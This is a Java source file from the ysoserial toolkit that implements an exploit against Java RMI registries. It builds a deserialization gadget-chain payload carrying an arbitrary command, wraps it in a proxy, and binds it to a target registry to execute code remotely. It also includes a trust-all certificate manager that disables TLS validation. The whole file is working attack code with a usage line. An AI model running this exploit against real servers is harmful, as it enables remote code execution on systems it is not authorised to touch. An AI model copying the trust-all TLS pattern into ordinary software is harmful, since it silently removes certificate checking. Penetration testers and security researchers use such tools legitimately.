package ysoserial.exploit;

import java.io.IOException;
import java.net.Socket;
import java.rmi.ConnectIOException;
import java.rmi.Remote;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.RMIClientSocketFactory;
import java.security.cert.X509Certificate;
import java.util.concurrent.Callable;
import javax.net.ssl.*;

import ysoserial.payloads.CommonsCollections1;
import ysoserial.payloads.ObjectPayload;
import ysoserial.payloads.ObjectPayload.Utils;
import ysoserial.payloads.util.Gadgets;
import ysoserial.secmgr.ExecCheckingSecurityManager;

/*
 * Utility program for exploiting RMI registries running with required gadgets available in their ClassLoader.
 * Attempts to exploit the registry itself, then enumerates registered endpoints and their interfaces.
 *
 * TODO: automatic exploitation of endpoints, potentially with automated download and use of jars containing remote
 * interfaces. See http://www.findmaven.net/api/find/class/org.springframework.remoting.rmi.RmiInvocationHandler .
 */
@SuppressWarnings({"rawtypes", "unchecked"})
public class RMIRegistryExploit {
	/**
	 * Trust manager whose checks do nothing, so every certificate chain is accepted without validation.
	 * Used so the client can connect to registries served over TLS with self-signed or otherwise
	 * untrusted certificates.
	 */
	private static class TrustAllSSL implements X509TrustManager {
		private static final X509Certificate[] ANY_CA = {};

		@Override
		public X509Certificate[] getAcceptedIssuers() { return ANY_CA; }

		@Override
		public void checkServerTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ }

		@Override
		public void checkClientTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ }
	}

	/**
	 * RMI client socket factory that opens TLS sockets using {@link TrustAllSSL}.
	 * A fresh "TLS" {@link SSLContext} is created for every socket.
	 */
	private static class RMISSLClientSocketFactory implements RMIClientSocketFactory {
		@Override
		public Socket createSocket(String host, int port) throws IOException {
			try {
				SSLContext ctx = SSLContext.getInstance("TLS");
				ctx.init(null, new TrustManager[] {new TrustAllSSL()}, null);
				SSLSocketFactory factory = ctx.getSocketFactory();
				return factory.createSocket(host, port);
			} catch (Exception e) {
				// RMIClientSocketFactory only allows IOException; keep the original cause.
				throw new IOException(e);
			}
		}
	}

	/**
	 * Command-line entry point.
	 *
	 * @param args {@code <host> <port> <payload_type> <payload_arg>}. {@code payload_type} is the simple
	 *             class name of a class in the same package as {@code CommonsCollections1}, and
	 *             {@code payload_arg} is passed to that payload's {@code getObject(String)}.
	 * @throws IllegalArgumentException if fewer than four arguments are given
	 * @throws ClassCastException if {@code payload_type} does not name an {@link ObjectPayload}
	 * @throws Exception if the port is not numeric, the payload class cannot be loaded, or
	 *                   {@link #exploit} fails
	 */
	public static void main(final String[] args) throws Exception {
		if (args == null || args.length < 4) {
			throw new IllegalArgumentException("Usage: java -cp ysoserial.jar "
				+ RMIRegistryExploit.class.getName() + " <host> <port> <payload_type> <payload_arg>");
		}
		final String host = args[0];
		final int port = Integer.parseInt(args[1]);
		final String command = args[3];
		Registry registry = LocateRegistry.getRegistry(host, port);
		final String className = CommonsCollections1.class.getPackage().getName() + "." + args[2];
		// asSubclass verifies the type up front instead of relying on an unchecked cast that would only
		// fail after the class had already been instantiated.
		final Class<? extends ObjectPayload> payloadClass =
			Class.forName(className).asSubclass(ObjectPayload.class);

		// Test the plain RMI registry connection; if it fails at connect time, retry over TLS.
		try {
			registry.list();
		} catch (ConnectIOException ex) {
			registry = LocateRegistry.getRegistry(host, port, new RMISSLClientSocketFactory());
		}

		exploit(registry, payloadClass, command);
	}

	/**
	 * Instantiates {@code payloadClass}, builds its object for {@code command}, and sends it to
	 * {@code registry} via {@link Registry#bind}. The object is wrapped in a {@link Remote} proxy under a
	 * unique {@code "pwned" + System.nanoTime()} name.
	 *
	 * <p>Any {@link Throwable} from {@code bind} is printed rather than propagated.
	 * NOTE(review): presumably a remote error is the expected outcome here, so it is not treated as fatal.
	 *
	 * @param registry     registry stub to bind against
	 * @param payloadClass payload implementation to instantiate via its no-arg constructor
	 * @param command      argument passed to {@link ObjectPayload#getObject}
	 * @throws Exception if payload construction, proxy creation, or payload release fails
	 */
	public static void exploit(final Registry registry,
			final Class<? extends ObjectPayload> payloadClass,
			final String command) throws Exception {
		// Run under ExecCheckingSecurityManager, presumably so the payload cannot execute in this JVM
		// while it is being constructed or serialized.
		new ExecCheckingSecurityManager().callWrapped(new Callable<Void>() {
			@Override
			public Void call() throws Exception {
				final ObjectPayload payloadObj = payloadClass.newInstance();
				final Object payload = payloadObj.getObject(command);
				try {
					final String name = "pwned" + System.nanoTime();
					final Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
					try {
						registry.bind(name, remote);
					} catch (Throwable e) {
						e.printStackTrace();
					}
				} finally {
					// Release the payload even if proxy/map construction throws.
					Utils.releasePayload(payloadObj, payload);
				}
				return null;
			}
		});
	}
}